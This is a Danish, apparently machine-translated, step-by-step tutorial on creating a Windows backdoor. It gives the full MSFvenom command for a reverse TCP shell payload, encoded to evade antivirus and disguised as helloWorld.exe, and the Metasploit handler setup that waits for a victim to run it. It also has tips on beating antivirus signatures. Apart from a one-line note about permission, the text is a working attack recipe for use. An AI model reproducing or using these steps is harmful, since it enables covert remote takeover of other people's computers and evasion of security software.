En bagdør bruges til at omgå sikkerhedsmekanismer, ofte hemmeligt og for det meste uopdageligt. Ved hjælp af MSFvenom, kombinationen af msfpayload og msfencode, er det muligt at oprette en bagdør, der forbinder tilbage til angriberen ved hjælp af reverse shell TCP. For at udvikle en bagdør skal du ændre signaturen på din malware for at undgå enhver antivirus -software. Gennemfør dette projekt på et par computere, som du har tilladelse til at få adgang til, og i processen lærer du mere om computersikkerhed, og hvordan denne form for bagdør fungerer.
Trin
Trin 1. Start Kali, og tænd for terminalen
Trin 2. Skriv ifconfig for at vise grænsefladen og kontrollere din IP -adresse
Trin 3. Skriv msfvenom -l encoders for at vise listen over encodere
Du vil bruge x86/shikata_ga_nai som encoder
Trin 4. Skriv "msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe
- -a x86 -platform -vinduer angiver arkitektur, der skal bruges.
- -p windows/shell/reverse_tcp angiver den nyttelast, der skal integreres.
- LHOST angiver lytterens IP -adresse.
- LPORT angiver lytterporten.
- -b "\ x00" angiver at undgå dårlig karakter (null bytes).
- -e x86/shikata_ga_nai angiver koders navn.
- -f exe> helloWorld.exe angiver formatoutput.
Trin 5. Skriv msfconsole for at aktivere Metasploit
Nu har du genereret din bagdør. Når offeret klikker på helloWorld.exe, aktiveres shell -nyttelasten, der er integreret, og opretter en forbindelse tilbage til dit system. For at modtage forbindelsen skal du åbne multi-handler i Metasploit og indstille nyttelast
Trin 6. Skriv use exploit/multi/handler
Trin 7. Skriv sæt nyttelast windows/shell/reverse_tcp
Trin 8. Skriv vis muligheder for at kontrollere modulet
Trin 9. Skriv sæt LHOST 192.168.48.129
"LHOST" angiver lytterens IP -adresse
Trin 10. Type sæt LPORT 4444
"LPORT" angiver lytterporten
Trin 11. Skriv kør og vent på forbindelsen fra offerets maskine
Trin 12. Vent på, at offeret klikker på helloWorld.exe
Derefter får du succesfuld forbindelse til offerets maskine.
Tips
- Brug af -i i MSFvenom repræsenterer iterationerne af kodningen. Nogle gange kan flere iterationer hjælpe med at undgå AV -softwaren.
- Du har lært at generere bagdøren og kodet ved hjælp af MSFvenom, men denne metode vil ikke fungere perfekt mod nogle af AV -software i dag. Årsagen bag dette er på grund af udførelsesskabelonerne i MSFvenom. AV -leverandørerne har tilføjet den statiske signatur af disse skabeloner og kigger bare efter dem. Løsningen på dette problem er at bruge en anden udførelsesskabelon eller forskellige værktøjer.